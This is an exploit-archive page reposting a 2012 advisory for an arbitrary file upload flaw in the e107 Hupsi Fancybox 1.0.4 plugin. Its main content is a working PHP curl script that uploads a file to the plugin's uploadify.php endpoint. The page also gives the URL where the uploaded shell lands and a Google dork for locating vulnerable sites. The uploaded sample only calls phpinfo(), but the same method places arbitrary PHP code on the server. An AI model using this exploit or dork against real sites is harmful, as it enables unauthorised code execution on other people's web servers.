e107 Hupsi Fancybox 1.0.4 Shell Upload

e107 Hupsi Fancybox 1.0.4 Shell Upload: Posted Jun 19, 2012; Authored by Sammy FORGIT; e107 Hupsi Fancybox plugin version 1.0.4 suffers from a remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | 727a4c7d0667d51fdc6d9063229dfbd1e7e1bb30b5ff957fb971eb33023c1113; Download | Favorite | View

e107 Hupsi Fancybox 1.0.4 Shell Upload

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Sammy FORGIT member from Inj3ct0r Team             1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : e107 Plugins - Hupsi fancybox Arbitrary File Upload Vulnerability
# Version : 1.0.4
# link : http://e107.org/e107_plugins/psilo/list.php?mode=plugin&cat=0&id=1162
# Software : http://e107.org/e107_plugins/psilo/psilo.php?download.1162
# Date : 18-06-2012
# Google Dork : inurl:/e107_plugins/hupsi_fancybox
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php";

$ch = curl_init("http://www.exemple.com/e107/e107_plugins/hupsi_fancybox/uploader/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
               array('Filedata'=>"@$uploadfile",
          'username'=>'test',
          'folder'=>'/e107/e107_plugins/hupsi_fancybox/uploader/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>

Shell Access : http://www.exemple.com/e107/e107_plugins/hupsi_fancybox/uploader/test_lo.php

lo.php
<?php 
phpinfo(); 
?>


# Site : 1337day.com Inj3ct0r Exploit Database

Top Authors In Last 30 Days

Red Hat 250 files
Ubuntu 111 files
indoushka 49 files
Jasper Nota 25 files
Gentoo 19 files
Willem Westerhof 19 files
Debian 12 files
Jim Blankendaal 11 files
Apple 10 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,085)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,603)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,440)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,724)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

e107 Hupsi Fancybox 1.0.4 Shell Upload

e107 Hupsi Fancybox 1.0.4 Shell Upload

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

e107 Hupsi Fancybox 1.0.4 Shell Upload

Share This

e107 Hupsi Fancybox 1.0.4 Shell Upload

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems